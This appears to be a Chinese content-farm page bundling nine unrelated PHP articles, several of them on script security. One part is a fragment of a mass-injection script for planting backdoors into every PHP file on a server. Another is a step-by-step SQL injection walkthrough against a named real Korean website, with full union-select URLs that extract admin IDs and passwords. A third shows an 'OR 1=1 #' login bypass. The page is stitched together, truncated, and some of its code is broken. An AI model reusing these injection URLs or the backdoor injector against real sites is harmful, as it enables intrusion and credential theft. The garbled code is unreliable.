vbs调用php脚本安全

时间:2022-05-03 22:29:37 其他范文 收藏本文 下载本文

vbs调用php脚本安全(共9篇)由网友“Johnny”投稿提供,以下是小编为大家汇总后的vbs调用php脚本安全,希望能够帮助到大家。

vbs调用php脚本安全

篇1:vbs调用php脚本安全

php有很多强大的函数,特别是数组函数是很多vbs没有的,如果直接调用就省事多了,我只想到一个粗糙的方法调用,期待高手有更好的办法。

Set ws = CreateObject(“WScript.Shell”)

Set oExec = ws.Exec(“D:PC_webserverphpphp.exe D:PC_webserverphp1.php”)

arraystr= oExec.StdOut.Readall

wsh.echo arraystr

篇2:如何在PHP脚本中调用外部命令

PHP 脚本中受到如下四个方面的限制: 由于 PHP 基本是用于 WEB 顺序开发的所以平安性成了人们考虑的一个重要方面,

如何在PHP脚本中调用外部命令

于是 PHP 设计者们给 PHP 加了一个门:平安模式。如果运行在平安模式下。 执行外部命令 ;打开文件时有些限制;连接 MySQL 数据库;基于 HTTP

篇3:PHP批量挂马脚本脚本安全

批量写入档案脚本...

可以拿来挂马

也能拿来当RFI的后门注入

code都写明的,有需要的请自己看

后门写在$inj里面,要做base64 encode的Polymorphic

不希望这个东西被搞破坏的人拿去玩

懂原理的就自个儿收下吧

*******************************************************************

set_time_limit(0);

ignore_user_abort(1);

# PHP Mass Injection Script. by f3v3r ver.228

# |1| Look for PHP in directory.|2| Check injected.

# |3| Inject script. |4|Can email report to you.

$inj ='';

$log_email = 0;//change 1 enable, somehow they can trace you by this way.

$email = 'f3v3r@cc.cc';

$log_report = 1;

$filename = '__log.html';

$delete_me = 1;

echo 'f3v3r injection toolzDefacez aint hack, r00tz r.

';

$dir = opendir('.');

$site=(isset(

*******************************************************************

篇4:和我一起学PHP手工注入脚本安全

作者:冰的原点[L.S.T]

看了这么多的ASP注入的,各位是不是已经厌倦了ASP方面的注入呢?呵呵,千万不能厌倦呀,只有不断的学习,才不会被别人甩很远的!那么今天就跟着我一起学习下PHP环境下的手工注入吧.

今天的网站是一韩国的站点,注入点我已经找到了,大家如果怕麻烦的话,可以用啊D找下注入点,其实啊D不仅能找出ASP环境下的注入点,而且PHP,ASPX以及JSP的都可以找出来的哦,截张图大家看下,如图1.

其实找注入点这种事对啊D来说还是很容易的,不过接下来的事就得靠我们自己的双手来进行了.回到正文上,我们首先要判断下数据库是不是使用的mysql,在注入点处输入/*,如果正常返回的话就说明是mysql的了,因为mysql数据是支持/*的注释的,如图2,返回正确页面,然后我们得判断下mysql的版本,如果支持union查询就好办多了,我们在注入点处输入如下语句:and ord(mid(version,1,1))>51/*,返回正常,如图3..说明数据库版本是大于4.0的,也就是说支持union查询的.到这里我们最好先判断下权限,如果是root的话后面的提权就好办多了,我们提交:ord(mid(user(),1,1))=114/*,返回错误,说明不是root的权限,只能老老实实的猜表啦.好,接下来猜它的字段数,利用order by 后面加数字的方法能够很快猜出字段数,例如我提交:www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 10,返回正常,说明字段数大于10的,如图4,继续猜,然后提交www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 20,返回错误,如图5,说明字段数小于20,接下来就是苦力活了,当我们提交www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 17正常,而www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 18时错误,说明字段数就是17了,接下来就得猜列名了咯,我们提交:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*如图6.在网页中显示出的数字中替换成我们的语句,我们继续提交,www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15,16,17/*,如图7,出现了版本号和当然数据库用户名了,接下来当然是猜表啦,首先我们想到的当然是admin这个表啦,继续提交:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15,16,17%20from%20admin/*返回正常,说明存在admin这个表的,接下来就是最关键的地方了,我们得猜下用户名和密码的,提交:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),username,8,9,10,11,12,13,14,15,16,17%20from%20admin/*返回错误,看来不存在username这个列名,接下来就是漫长的猜解过程啦,可是始终没有猜到用户名,不过倒是把ID和密码猜出来的,我提交的语句是这样的:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),id,passwd,9,10,11,12,13,14,15,16,17%20from%20admin/*,呵呵,暴出来了,如图8

文章到这里就要结束了,其实在乎只是这个过程而已,没有暴出用户名,而且后面的后台也没有找到,所以就只能放一放啦!不过,希望各位叉子能从本文学点东西的话,本文就会有它的价值了!

篇5:用PHP 4.2书写安全的脚本PHP

在很长一段时间内,PHP作为 服务器 端 脚本语言 的最大卖点之一就是会为从表单提交的值自动建立一个全局变量,在PHP 4.1中,PHP的制作者们推荐了一个访问提交数据的替代手段。在PHP 4.2中,他们取消了那种老的做法!正如我将在这篇文章中解释的那样,作出这

在很长一段时间内,PHP作为服务器端脚本语言的最大卖点之一就是会为从表单提交的值自动建立一个全局变量。在PHP 4.1中,PHP的制作者们推荐了一个访问提交数据的替代手段。在PHP 4.2中,他们取消了那种老的做法!正如我将在这篇文章中解释的那样,作出这样的变化的目的是出于安全性的考虑。我们将研究PHP在处理表单提交及其它数据时的新的做法,并说明为什么这样做会提高代码的安全性。

这里有什么错误?

看看下面的这段PHP脚本,它用来在输入的用户名及口令正确时授权访问一个Web页面:

php>

// 检查用户名及口令

if ($username == 'kevin' and $password == 'secret')

$authorized = true;

?>

Please enter your username and password:

Username:

Password:

OK,我相信大约半数的读者会不屑的说“太愚蠢了-- 我不会犯这样的错误的!”但是我保证有很多的读者会想“嗨,没什么问题啊,我也会这么写的!”当然还会有少数人会对这个问题感到困惑(“什么是PHP?”)。PHP被设计为一个“好的而且容易的”脚本语言,初学者可以在很短的时间内学会使用它;它也应该能够避免初学者犯上面的错误。

再回到刚才的问题,上面的代码中存在的问题是你可以很容易地获得访问的权力,而不需要提供正确的用户名和口令。只在要你的浏览器的地址栏的最后添加?authorized=1。因为PHP会自动地为每一个提交的值创建一个变量 -- 不论是来自动一个提交的表单、URL查询字符串还是一个cookie -- 这会将$authorized设置为1,这样一个未授权的用户也可以突破安全限制。

那么,怎么简单地解决这个问题呢?只要在程序的开头将$authorized默认设置为false。这个问题就不存在了!$authorized是一个完全在程序代码中创建的变量;但是为什么开发者得为每一个恶意的用户提交的变量担心呢?

PHP 4.2作了什么改变?

在PHP 4.2中,新安装的PHP中的register_globals选项默认为关闭,因此EGPCS值(EGPCS是Environment、Get、Post、Cookies、Server的缩写 -- 这是PHP中外部变量来源的全部范围)不会被作为全局变量来创建。当然,这个选项还可以通过手工来开启,但是PHP的开发者推荐你将其关闭。要贯彻他们的意图,你需要使用其它的方法来获取这些值。

从PHP 4.1开始,EGPCS值就可以从一组指定的数组中获得:

$_ENV -- 包含系统环境变量

$_GET -- 包含查询字符串中的变量,以及提交方法为GET的表单中的变量

$_POST -- 包含提交方式为POST的表单中的变量

$_COOKIE -- 包含所有cookie变量

$_SERVER -- 包含服务器变量,例如HTTP_USER_AGENT

$_REQUEST -- 包含$_GET、$_POST和$_COOKIE的全部内容

$_SESSION -- 包含所有已注册的session变量

在PHP 4.1之前,当开发者关闭register_globals选项(这也被考虑为提高PHP性能的一种方法)后,必须使用诸如$HTTP_GET_VARS这样的令人讨厌的名字来获取这些变量。这些新的变量名不仅仅短,而且它们还有其他优点。

首先,让我们在PHP 4.2中(也就是说关闭register_globals 选项)重写上面提到的代码:

$username = $_REQUEST['username'];

$password = $_REQUEST['password'];

// 检查用户名和口令

if ($username == 'kevin' and $password == 'secret')

$authorized = true;

?>

Please enter your username and password:

Username:

Password:

正如你看到的,我所需要做的只是在代码的开始增加下面两行:

$username = $_REQUEST['username'];

$password = $_REQUEST['password'];

因为我们希望用户名和密码是由用户提交的,所以我们从$_REQUEST数组中获取这些值。使用这个数组使得用户可以自由选择传递方式:通过URL查询字符串(例如允许用户创建书签时自动输入他们的证书)、通过一个提交的表单或者是通过一个cookie。如果你想要限制只能通过表单提交证书(更精确地说,是通过HTTP POST请求),你可以使用$_POST数组:

$username = $_POST['username'];

$password = $_POST['password'];

除了“引入”这两个变量以外,程序代码没有任何改变。简单地关闭register_globals选项促使开发者更进一步了解哪些数据是来自外部的(不可信任的)资源。

请注意这里还有一个小问题:PHP中默认的error_reporting设置仍然是E_ALL & ~E_NOTICE,因此如果“username”和“password”这两个值没有被提交,试图从$_REQUEST数组或$_POST数组中获得这两个值并不会招致任何错误信息。如晨不你的PHP程序需要严格的错误检查,你还需要增加一些代码以首先检查这些变量。

但是这是不是意味着更多的输入?

是的,在象上面这样的简单程序中,使用PHP 4.2常常会增加输入量,

但是,还是看看光明的一面吧 -- 你的程序终究是更安全了!

不过认真的说,PHP的设计者并没有完全忽视你的痛苦。在这些新数组中有一个特殊的其它所PHP变量都不具备的特征,它们是完全的全局变量。这对你有什么帮助呢?让我们先对我们的示例进行一下扩充。

为了使得站点中的多个页面可以使用用户名/口令论证,我们将我们用户认证程序写到一个include文件(protectme.php)中:

/* protectme.php */

function authorize_user($authuser, $authpass)

{

$username = $_POST['username'];

$password = $_POST['password'];

// 检查用户名和口令

if ($username != $authuser or $password != $authpass):

?>

Please enter your username and password:

Username:

Password:

exit();

endif;

}

?>

现在,我们刚才的页面看上去将是这样的:

require('protectme.php');

authorize_user('kevin','secret');

?>

很简单,很清晰明了,对不对?现在是考验你的眼力和经验的时候了 -- 在authorize_user 函数中少了什么?

在函数中没有申明$_POST是一个全局变量!在php 4.0中,当register_globals开启时,你需要增加一行代码以在函数中获取$username和$password变量:

function authorize_user($authuser, $authpass)

{

global $username, $password;

...

在PHP中,和其它具有类似语法的语言不同,函数外的变量在函数中不能自动获得,你需要象上面所说明的那样增加一行以指定其来自global范围。

在PHP 4.0中,当关闭register_globals以提供安全性时,你可以使用$HTTP_POST_VARS数组以获得你的表单提交的值,但是你还是需要从全局范围导入这个数组:

function authorize_user($authuser, $authpass)

{

global $HTTP_POST_VARS;

$username = $HTTP_POST_VARS['username'];

$password = $HTTP_POST_VARS['password'];

但是在PHP 4.1及以后的版本中,特殊的$_POST变量(以及上面提到的其它变量)可以在所有范围内使用。这就是不需要在函数中申明$_POST变量是一个全局变量的原因:

function authorize_user($authuser, $authpass)

{

$username = $_POST['username'];

$password = $_POST['password'];

这对session有什么影响?

特殊的$_SESSION数组的引入实际上有助于简化session代码。你不需要将session变量申明为全局变量,然后再去留意哪些变量被注册了,你现在可以简单地从$_SESSION['varname']中引用你所有的session变量。

现在让我们来看看另一个用户认证的例子。这一次,我们使用sessions以标志一个在你的网站继续逗留的用户已经经过了用户认证。首先,我们来看看PHP 4.0版本(开启register_globals):

session_start();

if ($username == 'kevin' and $password == 'secret')

{

$authorized = true;

session_register('authorized');

}

?>

和刚开始的程序一样,这个程序也存在安全漏洞,在URL的最后加上?authorized=1可以绕过安全措施直接访问页面内容。开发者可以将$authorized视为一个session变量而忽视了可以很容易地通过用户输入设置同样的变量。

当我们增加了我们的特殊的数组(PHP 4.1)并关闭register_globals(PHP 4.2)后,我们的程序将是这样的:

session_start();

if ($username == 'kevin' and $password == 'secret')

$_SESSION['authorized'] = true;

?>

是不是更加简单了?你不再需要再将普通的变量注册为一个session变量,你只需要直接设置session变量(在$_SESSION数组中),然后用同样的方法使用它。程序变得更短了,而且对于什么变量是session变量也不会引起混乱!

总结

在这篇文章中,我解释了PHP脚本语言作出改变的深层原因。在PHP 4.1中,添加了一组特殊数据以访问外部数据。这些数组可以在任何范围内调用,这使得外部数据的访问更方便。在PHP 4.2中,register_globals被默认关闭以鼓励使用这些数组以避免无经验的开发者编写出不安全的PHP代码。

原文转自:www.ltesting.net

篇6:关于php注入中的magicquotesgpc脚本安全

BY:Hans

magic_quotes_gpc = on

大家都知道php配置文件php.in ,如果里面的magic_quotes_gpc 配置被打开 那就是magic_quotes_gpc = on 懂点php的人都知道,

那我们就要对数值型的字段注入。

if ( isset($_POST[“f_login”] ) )

{

//连接数据库

$t_strUid = $_POST[“f_uid”];

$t_strPwd = $_POST[“f_pwd”];

$t_strSQL = “SELECT * FROM tbl_users WHERE uid=$t_strUid AND password = '$t_strPwd' LIMIT 0,1”;

if ( $t_hRes = mysql_query($t_strSQL) )

{

// 成功查询

}

}

?>

sample test

User ID:

Password:

上面这个代码是要我们输入username 和password 登入,有些代码省略了,

如果正确输入:

select * from tbltable_users WHERE userid=admin AND password = 'admin' LIMIT 0,1

如果攻击者在username处,输入:admin OR 1 =1 #,则注入的sql语句如下:

SELECT * FROM table_users WHERE userid=admin OR 1 =1 # AND password = 'admin' LIMIT 0,1

下面就可以进行注入了.

在php.ini 中把display_errors 选项设为display_errors = off 这样就可以防止.

篇7:php调用父类方法

class impro_mysqli extends mysqli{

/*显示上一个插入记录的ID*/

我们就不能使用!

代码:

function id{

return this->insert_id();

}

因为这样程序会判断在 impro_mysqli 中有个insert_id();的方法,然而实际上,并没有!

而使用

代码:

function id(){

return mysqli_insert_id();

}

虽然正确,但是失去了使用继承的意义,那我们该怎么做呢 ?

很简单,我们只要使用 parent::(parent+2个英文字符的冒号) 字符就好了

所以想要调用父类的函数,就可以写成

代码:

function id(){

return parent::insert_id();

}

篇8:php调用父类方法

1

2 class EMBA_student // 声明EMBA学生类

3 {

4 //用var来定义类的属性

5 var $no; //序号

6 var $name; // 姓名

7 var $gender; //性别

8 var $age; //年龄

9

10 //方法

11 //方法1 ,设定学生的信息方法

12 function set_data ($arr)

13 {

14 $this->no=$arr[“no”];

15 $this->name=$arr[“name”];

16 $this->gender=$arr[“gender”];

17 $this->age=$arr[“age”];

18 }

19 // 方法2, 让学生年龄长大$i岁

20 function set_grow($i)

21 {

22 $this->age+=$i;

23 }

24 //方法3 ,输出学生信息的方法

25 function get_data()

26 {

27 echo “

28长江商学院EMBA班学生信息

29 ”;

30

31 echo“学号:$this->no

”;

32 echo“姓名:$this->name

”;

33 echo“性别:$this->gender

”;

34 echo“年龄:$this->age

”;

35

36 }

37 }

38 // 继承EMBA学生类,来创建一个EMBA方向类

39 class college_student extends EMBA_student{

40 var $department; //定义一个新的属性所在系

41 //重载父类的方法,设定学员的信息

42 function set_data($arr)

43 {

44 parent::set_data($arr);

45 $this->department=$arr[“department”];

46 }

47 function change_department($new_department) //定义一个新的方法,更换所在系

48 {

49 $this->department=$new_department; //让学员所在系变成参数系

50 }

51 //输出学生的信息

52 function get_data(){

53 parent::get_data();

54 echo“学习方向:$this->department

”;

55 }

56

57 }

58 //实例化一个对象

59 $s=new college_student;

60 $arr=array(“no”=>“1”,“name”=>“Qian Zhang”,“gender”=>“Female”,“age”=>“33”,“department”=>“商业营销”);

61 $s->set_data($arr);

62 $s->get_data();

63

64

65

66 ?>

篇9:php调用父类方法

class person {

public $name='Tom';

public $gender; //性别

public $money=1000;

public function __construct(){

echo '这里是父类',PHP_EOL;

}

public function say(){

echo $this->name,“tis”,$this->gender,“rn”;

}

}

class family extends person{

public $name;

public $gender;

public $age;

public $money=100000;

public function __construct(){

parent::__construct(); //调用父类构造方法

echo '这里是子类',PHP_EOL;

}

public function say(){

parent::say(); //调用父类方法

echo $this->name,“tist”,$this->gender,“,and ist”,$this->age,PHP_EOL;

}

public function cry(){

echo parent::$money,PHP_EOL; //报错,为什么不可以

echo '%>_<%',PHP_EOL;

echo self::$money,PHP_EOL; //调用自身构造方法

echo '(*^_^*)';

}

}

$poor=new family();

$poor->name='李';

$poor->gender='女';

$poor->age=25;

$poor->say();

$poor->cry();

Echo 写入VBS提权

伪科学:Mysql system函数提权

让脚本躲过杀毒软件脚本安全

php笔试题附带详细答案

php 面试题

教你做服务级的木马后门

爆破字典生成小脚本脚本安全

linux当mysql以root权限登录时提权网站安全

唯品会php面试题

PHP安全 XSS篇

vbs调用php脚本安全
《vbs调用php脚本安全.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【vbs调用php脚本安全(集锦9篇)】相关文章:

FTP常用软件servu的安全权限处理WEB安全2022-12-10

php调用父类方法2022-12-28

几道PHP笔试题2022-07-22

关于精选php面试题及答案2022-05-14

PHP笔试题目及答案2023-09-04

脚本范文2022-04-29

IIS信息服务器排错指导服务器教程2023-04-12

一个防注入的小白错误千博企业程序漏洞预警2022-09-25

hr面试题及答案2022-10-01

seo面试题与答案2023-02-15

点击下载本文文档